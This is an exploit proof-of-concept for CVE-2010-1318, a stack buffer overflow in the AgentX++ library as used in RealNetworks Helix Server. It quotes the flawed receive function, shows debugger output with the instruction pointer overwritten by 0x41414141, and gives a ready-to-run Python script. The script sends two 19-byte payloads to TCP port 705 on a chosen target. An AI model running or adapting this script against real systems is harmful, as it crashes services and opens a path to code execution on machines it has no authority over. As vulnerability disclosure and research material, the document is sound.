# Exploit Title: Multiple Vendor AgentX++ Stack Buffer Overflow Vulnerability # Date: 2010-04-17 # Author: ZSploit.com # Software Link: N/A # Version: N/A # Tested on: RealNetworks Helix Server v11 # CVE : CVE-2010-1318
#! /usr/bin/env python ############################################################################### ## File : zs_agentx_bof.py ## Description: ## : ## Created_On : Apr 17 2010 ## ## (c) Copyright 2010, ZSploit.com. all rights reserved. ############################################################################### """ int AgentX::receive_agentx(int sd, AgentXPdu& pdu) {
u_char buffer[AGENTX_HEADER_LEN+1]; [1] u_int payloadLen; boolean netByteOrder; int status;
// read header unsigned int bytesRead = 0; while (bytesRead < AGENTX_HEADER_LEN) { [2] #ifdef WIN32 if ((status = recv(sd, (char*)(buffer+bytesRead), AGENTX_HEADER_LEN, 0)) <= 0) {
if (status == 0) return AGENTX_DISCONNECT; if (status == SOCKET_ERROR) { LOG_BEGIN(ERROR_LOG | 1); LOG("AgentX: receive socket error (errno)"); LOG(WSAGetLastError()); LOG_END; return AGENTX_DISCONNECT; } else { LOG_BEGIN(ERROR_LOG | 1); LOG("AgentX: receive unknown error (status)"); LOG(status); LOG_END; return AGENTX_DISCONNECT; } } #else if ((status = read(sd, (void *)(buffer+bytesRead), AGENTX_HEADER_LEN)) <= 0) {
if (status == 0) return AGENTX_DISCONNECT; if (errno == EBADF) return AGENTX_BADF; else { LOG_BEGIN(ERROR_LOG | 1); LOG("AgentX: receive unknown error (errno)"); LOG(errno); LOG_END; return AGENTX_ERROR; } } #endif bytesRead += status; }
[1] Allocates 0x14 bytes stack buffer [2] The check should be consider the remainder bytes of the buffer
if we only send the data < 0x13 bytes, 2 packets will overwrite the stack buffer.
0:009> g (728.a3c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=fffffff6 ebx=00000000 ecx=00161230 edx=7c8285ec esi=00cbfd14 edi=00ccff80 eip=41414141 esp=00cbfd08 ebp=41414141 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 41414141 ?? ??? *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\mswsock.dll - 0:006> k ChildEBP RetAddr WARNING: Frame IP not in any known module. Following frames may be wrong. 00cbfd04 00edda20 0x41414141 00cbfd18 7c829fb5 0xedda20 00cbfd24 7c829f3d ntdll!RtlGetNtGlobalFlags+0x38 00cbfe0c 71b21a03 ntdll!RtlFreeHeap+0x126 00000000 00000000 mswsock+0x1a03
"""
import sys import socket
if (len(sys.argv) != 2): print "Usage:\t%s [target]" % sys.argv[0] sys.exit(0)
data = "A" * 19
host = sys.argv[1] port = 705
print "PoC for CVE-2010-1318 by ZSploit.com" try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((host, port)) print "Sending payload .." s.send(data) s.send(data) except: print "Error in send" print "Done" except: print "Error in socket"
|